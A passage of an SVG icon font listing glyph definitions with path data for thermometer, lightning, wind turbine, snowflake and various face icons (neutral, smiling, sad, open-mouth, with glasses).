<glyph unicode="&#xeb59;" glyph-name="thermometer-quarter2" d="M543.563 218.691c37.514-13.055 64.437-48.729 64.437-90.691 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.966 26.928 77.643 64.447 90.694-0.294 1.755-0.447 3.559-0.447 5.399v159.813c0 18.082 14.327 32.094 32 32.094 17.796 0 32-14.369 32-32.094v-159.813c0-1.847-0.149-3.652-0.437-5.403v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM638.996 272.003c39.862-35.181 65.004-86.656 65.004-144.003 0-106.039-85.961-192-192-192s-192 85.961-192 192c0 57.346 25.141 108.82 65.002 144.002-0.661 5.27-1.002 10.639-1.002 16.088v543.82c0 70.556 57.308 128.090 128 128.090 70.549 0 128-57.348 128-128.090v-543.82c0-5.447-0.342-10.816-1.004-16.087v0 0z" />
<glyph unicode="&#xeb5a;" glyph-name="thermometer-half" d="M543.542 218.698c37.525-13.049 64.458-48.728 64.458-90.698 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.965 26.927 77.641 64.445 90.694-0.293 1.751-0.445 3.55-0.445 5.386v319.842c0 17.495 14.327 32.079 32 32.079 17.796 0 32-14.362 32-32.079v-319.842c0-1.83-0.157-3.628-0.458-5.381v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM608 256.012c38.862-29.191 64-75.666 64-128.012 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 52.346 25.138 98.821 64 128.012v576.284c0 52.693 42.981 95.704 96 95.704 52.911 0 96-42.848 96-95.704v-576.284z" />
<glyph unicode="&#xeb5b;" glyph-name="thermometer-half2" d="M543.542 218.698c37.525-13.049 64.458-48.728 64.458-90.698 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.965 26.927 77.641 64.445 90.694-0.293 1.751-0.445 3.55-0.445 5.386v319.842c0 17.495 14.327 32.079 32 32.079 17.796 0 32-14.362 32-32.079v-319.842c0-1.83-0.157-3.628-0.458-5.381v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM638.996 272.003c39.862-35.181 65.004-86.656 65.004-144.003 0-106.039-85.961-192-192-192s-192 85.961-192 192c0 57.346 25.141 108.82 65.002 144.002-0.661 5.27-1.002 10.639-1.002 16.088v543.82c0 70.556 57.308 128.090 128 128.090 70.549 0 128-57.348 128-128.090v-543.82c0-5.447-0.342-10.816-1.004-16.087v0 0z" />
<glyph unicode="&#xeb5c;" glyph-name="thermometer-three-quarters" d="M543.553 218.694c37.519-13.052 64.447-48.728 64.447-90.694 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.961 26.922 77.635 64.435 90.69-0.286 1.727-0.435 3.5-0.435 5.309v480.003c0 17.448 14.327 31.999 32 31.999 17.796 0 32-14.326 32-31.999v-480.003c0-1.803-0.153-3.576-0.447-5.305v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM608 256.012c38.862-29.191 64-75.666 64-128.012 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 52.346 25.138 98.821 64 128.012v576.284c0 52.693 42.981 95.704 96 95.704 52.911 0 96-42.848 96-95.704v-576.284z" />
<glyph unicode="&#xeb5d;" glyph-name="thermometer-three-quarters2" d="M543.553 218.694c37.519-13.052 64.447-48.728 64.447-90.694 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.961 26.922 77.635 64.435 90.69-0.286 1.727-0.435 3.5-0.435 5.309v480.003c0 17.448 14.327 31.999 32 31.999 17.796 0 32-14.326 32-31.999v-480.003c0-1.803-0.153-3.576-0.447-5.305v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM638.996 272.003c39.862-35.181 65.004-86.656 65.004-144.003 0-106.039-85.961-192-192-192s-192 85.961-192 192c0 57.346 25.141 108.82 65.002 144.002-0.661 5.27-1.002 10.639-1.002 16.088v543.82c0 70.556 57.308 128.090 128 128.090 70.549 0 128-57.348 128-128.090v-543.82c0-5.447-0.342-10.816-1.004-16.087v0 0z" />
<glyph unicode="&#xeb5e;" glyph-name="thermometer-full" d="M543.577 218.686c37.507-13.059 64.423-48.729 64.423-90.686 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.959 26.919 77.632 64.43 90.688-0.283 1.715-0.43 3.476-0.43 5.272v608.080c0 17.924 14.327 31.96 32 31.96 17.796 0 32-14.309 32-31.96v-608.080c0-1.801-0.145-3.562-0.423-5.274v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM608 256.012c38.862-29.191 64-75.666 64-128.012 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 52.346 25.138 98.821 64 128.012v576.284c0 52.693 42.981 95.704 96 95.704 52.911 0 96-42.848 96-95.704v-576.284z" />
<glyph unicode="&#xeb5f;" glyph-name="thermometer-full2" d="M543.577 218.686c37.507-13.059 64.423-48.729 64.423-90.686 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.959 26.919 77.632 64.43 90.688-0.283 1.715-0.43 3.476-0.43 5.272v608.080c0 17.924 14.327 31.96 32 31.96 17.796 0 32-14.309 32-31.96v-608.080c0-1.801-0.145-3.562-0.423-5.274v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM638.996 272.003c39.862-35.181 65.004-86.656 65.004-144.003 0-106.039-85.961-192-192-192s-192 85.961-192 192c0 57.346 25.141 108.82 65.002 144.002-0.661 5.27-1.002 10.639-1.002 16.088v543.82c0 70.556 57.308 128.090 128 128.090 70.549 0 128-57.348 128-128.090v-543.82c0-5.447-0.342-10.816-1.004-16.087v0 0z" />
<glyph unicode="&#xeb60;" glyph-name="lightning" d="M546.134 512l49.065 128h-124.801l-73.598-192h82.516l-47.317-131.2 195.199 195.2h-81.065zM433.455 416h-81.455l96 256h192l-48-128h112l-352-352 81.455 224z" />
<glyph unicode="&#xeb61;" glyph-name="lightning2" d="M433.455 416h-81.455l96 256h192l-48-128h112l-352-352 81.455 224z" />
<glyph unicode="&#xeb62;" glyph-name="wind-turbine" d="M588.325 475.235c129.582-57.932 199.43-84.769 199.43-84.769s-79.096 63.048-173.25 130.291c-4.375-17.593-13.602-33.268-26.179-45.522v0 0zM428.114 520.984c-116.407-84.238-175.308-131.905-175.308-131.905s95.526 37.516 201.764 85.942c-12.744 12.338-22.079 28.175-26.456 45.963v0 0zM616.307 558.11c81.772-58.070 278.476-200.958 265.78-222.948-12.666-21.938-233.732 76.444-325.313 118.397v0l28.562-485.56c0 0-16-32-64-32s-64 32-64 32l28.562 485.56c-91.58-41.954-312.647-140.336-325.313-118.397-12.696 21.991 184.008 164.879 265.78 222.948 3.602 24.456 16.427 45.911 34.826 60.718 9.439 100.141 34.792 341.171 60.144 341.171s50.705-241.030 60.144-341.171c18.4-14.808 31.224-36.263 34.826-60.718v0 0zM517.544 448.074l-27.868-469.724c0 0 6.201-10.35 31.66-10.35s31.99 10.35 31.99 10.35l-28.158 469.725c-1.271-0.050-2.549-0.075-3.832-0.075-1.27 0-2.534 0.025-3.793 0.074v0 0zM547.886 636.282c-14.735 142.739-26.549 217.48-26.549 217.48s-15.25-101.335-26.429-217.446c8.396 2.399 17.262 3.684 26.429 3.684 9.21 0 18.117-1.297 26.549-3.718v0 0zM521.337 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeb63;" glyph-name="wind-turbine2" d="M616.307 558.11c81.772-58.070 278.476-200.958 265.78-222.948-12.666-21.938-233.732 76.444-325.313 118.397v0l28.562-485.56c0 0-16-32-64-32s-64 32-64 32l28.562 485.56c-91.58-41.954-312.647-140.336-325.313-118.397-12.696 21.991 184.008 164.879 265.78 222.948-0.678-4.605-1.030-9.317-1.030-14.11 0-53.019 42.981-96 96-96s96 42.981 96 96c0 4.794-0.351 9.505-1.030 14.11v0 0zM581.481 618.829c-9.439 100.141-34.792 341.171-60.144 341.171s-50.705-241.030-60.144-341.171c16.457 13.244 37.375 21.171 60.144 21.171s43.687-7.927 60.144-21.171v0 0zM521.337 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeb64;" glyph-name="snowflake" d="M415.143 341.77l74.23 74.23h-180.148c-0.754-1.945-1.906-3.764-3.466-5.324l-45.464-45.464c-6.327-6.327-16.275-6.144-22.523 0.104-6.066 6.066-6.295 16.332-0.104 22.523l28.16 28.16h-25.565c-9.011 0-16.263 7.163-16.263 16 0 8.578 7.281 16 16.263 16h24.081l-26.676 26.676c-6.191 6.191-5.961 16.457 0.104 22.523 6.248 6.248 16.196 6.432 22.523 0.104l45.464-45.464c1.156-1.156 2.088-2.454 2.8-3.84v0h180.815l-73.814 73.814c-1.728-0.669-3.599-1.039-5.552-1.039h-64.295c-8.948 0-15.852 7.163-15.852 16 0 8.578 7.097 16 15.852 16h38.886l-26.324 26.324c-6.237 6.237-6.045 16.541 0.021 22.607 6.248 6.248 16.375 6.252 22.607 0.021l26.213-26.213v38.664c0 8.755 7.422 15.852 16 15.852 8.837 0 16-6.904 16-15.852v-64.295c0-1.893-0.347-3.708-0.978-5.391l73.863-73.863v180.383c-1.494 0.729-2.892 1.708-4.127 2.944l-45.464 45.464c-6.327 6.327-6.144 16.275 0.104 22.523 6.066 6.066 16.332 6.295 22.523 0.104l26.963-26.963v24.655c0 9.011 7.163 16.263 16 16.263 8.578 0 16-7.281 16-16.263v-25.565l27.873 27.873c6.191 6.191 16.457 5.961 22.523-0.104 6.248-6.248 6.432-16.196 0.104-22.523l-45.464-45.464c-1.483-1.483-3.2-2.598-5.037-3.352v-179.975l73.863 73.863c-0.522 1.547-0.807 3.198-0.807 4.913v64.295c0 8.948 7.163 15.852 16 15.852 8.578 0 16-7.097 16-15.852v-38.015l26.043 26.043c6.231 6.231 16.358 6.228 22.607-0.021 6.066-6.066 6.258-16.37 0.021-22.607l-26.803-26.803h39.535c8.755 0 15.852-7.422 15.852-16 0-8.837-6.904-16-15.852-16h-64.295c-2.129 0-4.159 0.439-6.014 1.226v0l-73.522-73.522h181.724c0.712 1.386 1.644 2.684 2.8 3.84l45.464 45.464c6.327 6.327 16.275 6.144 22.523-0.104 6.066-6.066 6.295-16.332 0.104-22.523l-26.676-26.676h23.171c9.011 0 16.263-7.163 16.263-16 0-8.578-7.281-16-16.263-16h-24.655l28.16-28.16c6.191-6.191 5.961-16.457-0.104-22.523-6.248-6.248-16.196-6.432-22.523-0.104l-45.464 45.464c-1.56 1.56-2.712 3.379-3.466 5.324v0h-181.058l74.377-74.377c1.479 0.474 3.051 0.731 4.68 0.731h64.295c8.948 0 15.852-7.163 15.852-16 0-8.578-7.097-16-15.852-16h-37.706l25.453-25.453c6.237-6.237 6.045-16.541-0.021-22.607-6.248-6.248-16.375-6.252-22.607-0.021l-26.522 26.522v-39.844c0-8.755-7.422-15.852-16-15.852-8.837 0-16 6.904-16 15.852v64.295c0 2.211 0.473 4.317 1.32 6.229l-73.897 73.897v-181.46c1.837-0.754 3.554-1.869 5.037-3.352l45.464-45.464c6.327-6.327 6.144-16.275-0.104-22.523-6.066-6.066-16.332-6.295-22.523-0.104l-27.873 27.873v-24.081c0-9.011-7.163-16.263-16-16.263-8.578 0-16 7.281-16 16.263v23.171l-26.963-26.963c-6.191-6.191-16.457-5.961-22.523 0.104-6.248 6.248-6.432 16.196-0.104 22.523l45.464 45.464c1.235 1.235 2.633 2.215 4.127 2.944v181.868l-74.319-74.319c0.616-1.665 0.954-3.459 0.954-5.328v-64.295c0-8.948-7.163-15.852-16-15.852-8.578 0-16 7.097-16 15.852v38.577l-25.734-25.734c-6.231-6.231-16.358-6.228-22.607 0.021-6.066 6.066-6.258 16.37-0.021 22.607l25.932 25.932h-38.973c-8.755 0-15.852 7.422-15.852 16 0 8.837 6.904 16 15.852 16h64.295c1.977 0 3.869-0.378 5.615-1.063v0z" />
<glyph unicode="&#xeb65;" glyph-name="snowflake2" d="M415.143 341.77l74.23 74.23h-180.148c-0.754-1.945-1.906-3.764-3.466-5.324l-45.464-45.464c-6.327-6.327-16.275-6.144-22.523 0.104-6.066 6.066-6.295 16.332-0.104 22.523l28.16 28.16h-25.565c-9.011 0-16.263 7.163-16.263 16 0 8.578 7.281 16 16.263 16h24.081l-26.676 26.676c-6.191 6.191-5.961 16.457 0.104 22.523 6.248 6.248 16.196 6.432 22.523 0.104l45.464-45.464c1.156-1.156 2.088-2.454 2.8-3.84v0h180.815l-73.814 73.814c-1.728-0.669-3.599-1.039-5.552-1.039h-64.295c-8.948 0-15.852 7.163-15.852 16 0 8.578 7.097 16 15.852 16h38.886l-26.324 26.324c-6.237 6.237-6.045 16.541 0.021 22.607 6.248 6.248 16.375 6.252 22.607 0.021l26.213-26.213v38.664c0 8.755 7.422 15.852 16 15.852 8.837 0 16-6.904 16-15.852v-64.295c0-1.893-0.347-3.708-0.978-5.391l73.863-73.863v180.383c-1.494 0.729-2.892 1.708-4.127 2.944l-45.464 45.464c-6.327 6.327-6.144 16.275 0.104 22.523 6.066 6.066 16.332 6.295 22.523 0.104l26.963-26.963v24.655c0 9.011 7.163 16.263 16 16.263 8.578 0 16-7.281 16-16.263v-25.565l27.873 27.873c6.191 6.191 16.457 5.961 22.523-0.104 6.248-6.248 6.432-16.196 0.104-22.523l-45.464-45.464c-1.483-1.483-3.2-2.598-5.037-3.352v-179.975l73.863 73.863c-0.522 1.547-0.807 3.198-0.807 4.913v64.295c0 8.948 7.163 15.852 16 15.852 8.578 0 16-7.097 16-15.852v-38.015l26.043 26.043c6.231 6.231 16.358 6.228 22.607-0.021 6.066-6.066 6.258-16.37 0.021-22.607l-26.803-26.803h39.535c8.755 0 15.852-7.422 15.852-16 0-8.837-6.904-16-15.852-16h-64.295c-2.129 0-4.159 0.439-6.014 1.226v0l-73.522-73.522h181.724c0.712 1.386 1.644 2.684 2.8 3.84l45.464 45.464c6.327 6.327 16.275 6.144 22.523-0.104 6.066-6.066 6.295-16.332 0.104-22.523l-26.676-26.676h23.171c9.011 0 16.263-7.163 16.263-16 0-8.578-7.281-16-16.263-16h-24.655l28.16-28.16c6.191-6.191 5.961-16.457-0.104-22.523-6.248-6.248-16.196-6.432-22.523-0.104l-45.464 45.464c-1.56 1.56-2.712 3.379-3.466 5.324v0h-181.058l74.377-74.377c1.479 0.474 3.051 0.731 4.68 0.731h64.295c8.948 0 15.852-7.163 15.852-16 0-8.578-7.097-16-15.852-16h-37.706l25.453-25.453c6.237-6.237 6.045-16.541-0.021-22.607-6.248-6.248-16.375-6.252-22.607-0.021l-26.522 26.522v-39.844c0-8.755-7.422-15.852-16-15.852-8.837 0-16 6.904-16 15.852v64.295c0 2.211 0.473 4.317 1.32 6.229l-73.897 73.897v-181.46c1.837-0.754 3.554-1.869 5.037-3.352l45.464-45.464c6.327-6.327 6.144-16.275-0.104-22.523-6.066-6.066-16.332-6.295-22.523-0.104l-27.873 27.873v-24.081c0-9.011-7.163-16.263-16-16.263-8.578 0-16 7.281-16 16.263v23.171l-26.963-26.963c-6.191-6.191-16.457-5.961-22.523 0.104-6.248 6.248-6.432 16.196-0.104 22.523l45.464 45.464c1.235 1.235 2.633 2.215 4.127 2.944v181.868l-74.319-74.319c0.616-1.665 0.954-3.459 0.954-5.328v-64.295c0-8.948-7.163-15.852-16-15.852-8.578 0-16 7.097-16 15.852v38.577l-25.734-25.734c-6.231-6.231-16.358-6.228-22.607 0.021-6.066 6.066-6.258 16.37-0.021 22.607l25.932 25.932h-38.973c-8.755 0-15.852 7.422-15.852 16 0 8.837 6.904 16 15.852 16h64.295c1.977 0 3.869-0.378 5.615-1.063v0zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0z" />
<glyph unicode="&#xeb66;" glyph-name="flashed-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 448v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM384 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0zM672 448v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM672 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM448 288v-32h160v32h-160z" />
<glyph unicode="&#xeb67;" glyph-name="flashed-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 448c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96zM384 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM672 448c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96zM672 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM448 288v-32h160v32h-160z" />
<glyph unicode="&#xeb68;" glyph-name="flashed-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 448v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM384 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0zM672 448v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM672 480c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xeb69;" glyph-name="flashed-face4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 448c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96zM384 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM672 448c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96zM672 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80z" />
<glyph unicode="&#xeb6a;" glyph-name="flashed-face-glasses" d="M297.515 585.721l-78.067 46.907c65.651 100.761 179.322 167.372 308.551 167.372s242.9-66.611 308.551-167.372l-78.067-46.907c-15.524 32.122-48.417 54.279-86.485 54.279-41.799 0-77.359-26.714-90.537-64h-106.925c-13.179 37.286-48.738 64-90.537 64-38.068 0-70.96-22.157-86.485-54.279zM288.495 553.809c-0.327-3.225-0.495-6.497-0.495-9.809 0-53.019 42.981-96 96-96s96 42.981 96 96v0h96c0-53.019 42.981-96 96-96s96 42.981 96 96c0 3.311-0.168 6.584-0.495 9.809l85.333 51.273c27.546-51.591 43.162-110.513 43.162-173.082 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 62.569 15.615 121.492 43.162 173.082l85.333-51.273zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400v0zM384 480v0c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM672 480v0c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xeb6b;" glyph-name="flashed-face-glasses2" d="M294.226 578.084c13.749 36.194 48.757 61.916 89.774 61.916 41.799 0 77.359-26.714 90.537-64h106.925c13.179 37.286 48.738 64 90.537 64 41.016 0 76.025-25.723 89.774-61.916v0l106.636 64.073c-70.49 113.937-196.585 189.843-340.409 189.843s-269.919-75.906-340.409-189.843l106.636-64.073zM288.001 544.492c-0.001-0.164-0.001-0.328-0.001-0.492 0-53.019 42.981-96 96-96s96 42.981 96 96v0h96c0-53.019 42.981-96 96-96s96 42.981 96 96c0 0.164 0 0.328-0.001 0.492l116.149 69.789c28.034-54.664 43.852-116.625 43.852-182.281 0-220.914-179.086-400-400-400s-400 179.086-400 400c0 65.656 15.819 127.618 43.852 182.281l116.149-69.789zM384 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM672 480c-35.346 0-64 28.654-64 64s28.654 64 64 64c35.346 0 64-28.654 64-64s-28.654-64-64-64zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80z" />
<glyph unicode="&#xeb6c;" glyph-name="face-missing-moth" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb6d;" glyph-name="face-missing-moth2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32z" />
<glyph unicode="&#xeb6e;" glyph-name="neutral-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM384 288v-32h288v32h-288z" />
<glyph unicode="&#xeb6f;" glyph-name="neutral-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM384 288v-32h288v32h-288z" />
<glyph unicode="&#xeb70;" glyph-name="smiling-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0z" />
<glyph unicode="&#xeb71;" glyph-name="smiling-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64z" />
<glyph unicode="&#xeb72;" glyph-name="sad-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64v0z" />
<glyph unicode="&#xeb73;" glyph-name="sad-face2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64z" />
<glyph unicode="&#xeb74;" glyph-name="face-open-mouth" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
